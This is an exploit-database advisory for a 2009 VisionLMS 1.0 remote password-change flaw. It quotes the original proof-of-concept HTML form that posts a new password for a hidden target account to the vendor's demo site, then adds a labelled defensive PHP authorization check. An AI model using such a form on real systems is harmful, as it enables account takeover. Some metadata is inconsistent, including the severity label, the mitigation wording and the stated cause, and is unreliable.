Vendor: VisionLMS
By: Mr.tro0oqy
CVSS: 9,3 (HIGH)
Remote Password Change
CWE: 20
Product Name: VisionLMS
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:visionlms:visionlms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

VisionLMS 1.0 | Change Password

A vulnerability in VisionLMS 1.0 allows an attacker to remotely change the password of any user. The vulnerability is due to insufficient validation of user-supplied input in the 'Password' parameter of the 'changePW.php' script. An attacker can exploit this vulnerability by sending a malicious request to the vulnerable script. Successful exploitation will result in the attacker being able to change the password of any user.

Mitigation:

Upgrade to the latest version of VisionLMS 1.0

Exploit-DB raw data:

<html>
<head>
<title>VisionLMS 1.0 | Change Password</title>
</head>
<body>
  <p>* VisionLMS 1.0 Remote Password Change<br>
  * Coded by Mr.tro0oqy<br>
  * E-mail t.4@windowslive.com ---&lt; Yemeni hacker<br>
  * Greetz All my Friends<br>
&nbsp;</p>



  <form enctype="multipart/form-data" method="post" name="form" action="http://visionlms.com/demo/changePW.php">
  <div style="font-weight:bold; color:#CC3300; padding:15;"></div>
   
  <div style="float:left; padding-left:15px; clear:both;"><input type="password" name="Password" value="" /></div>
  <div style="float:left; padding-left:20px;">
  <input type="hidden" name="EmailAddress" value="support@visionlms.com" />
  <input type="submit" name="submit" value="Change Password" onclick="return validateForm()" />
  </div>
  </form>
  </div> <!--END Activity DIV-->

 </div> <!--END Body DIV-->
  

 <!--START FOOTER NAVIGATION-->
 <!--<div id="Footer" class='Footer'>kjkjkj</div>-->
 <!--END FOOTER NAVIGATION-->








</body>
</html>

# milw0rm.com [2009-04-28]
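
The form above posts only `Password` and `EmailAddress` to `changePW.php`. The following is an added example, not VisionLMS code and not part of the original advisory: a server-side authorization check for a password-change handler, assuming the vulnerable script selects the account from the posted `EmailAddress`. The session keys, `csrf_token` and `CurrentPassword` are hypothetical names, and the sample requests are constructed.

```php
<?php
declare(strict_types=1);
// Added example, not VisionLMS code. Session keys, csrf_token and CurrentPassword
// are hypothetical; Password and EmailAddress are the fields the form above posts.

/** Returns [allowed, detail]; on success detail is the account to update. */
function authorizePasswordChange(array $session, array $post, string $storedHash): array
{
    // 1. The account is taken from the authenticated session only.
    $account = $session['user_email'] ?? '';
    if (!is_string($account) || $account === '') {
        return [false, 'not authenticated'];
    }
    // 2. A posted EmailAddress may not name a different account.
    $claimed = $post['EmailAddress'] ?? $account;
    if (!is_string($claimed) || strcasecmp($claimed, $account) !== 0) {
        return [false, 'account mismatch'];
    }
    // 3. Per-session anti-CSRF token, compared in constant time.
    $expected = $session['csrf_token'] ?? '';
    $token = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($token) || $expected === ''
        || !hash_equals($expected, $token)) {
        return [false, 'bad CSRF token'];
    }
    // 4. Re-authenticate with the current password before replacing it.
    $current = $post['CurrentPassword'] ?? '';
    if (!is_string($current) || !password_verify($current, $storedHash)) {
        return [false, 'current password incorrect'];
    }
    // 5. Basic sanity check on the new password.
    $new = $post['Password'] ?? '';
    if (!is_string($new) || strlen($new) < 12) {
        return [false, 'new password missing or too short'];
    }
    return [true, $account];
}

// Constructed sample data: one session and three requests.
$hash = password_hash('old-passphrase-1', PASSWORD_DEFAULT);
$sess = ['user_email' => 'alice@example.test', 'csrf_token' => bin2hex(random_bytes(16))];
$requests = [
    'no session, posted address' => [[], ['Password' => 'x', 'EmailAddress' => 'bob@example.test']],
    'other account named' => [$sess, ['Password' => 'long-enough-pass', 'EmailAddress' => 'bob@example.test']],
    'legitimate change' => [$sess, ['Password' => 'long-enough-pass',
        'csrf_token' => $sess['csrf_token'], 'CurrentPassword' => 'old-passphrase-1']],
];
foreach ($requests as $label => [$s, $p]) {
    [$ok, $detail] = authorizePasswordChange($s, $p, $hash);
    printf("%-28s %s (%s)\n", $label, $ok ? 'ALLOW' : 'DENY', $detail);
}
```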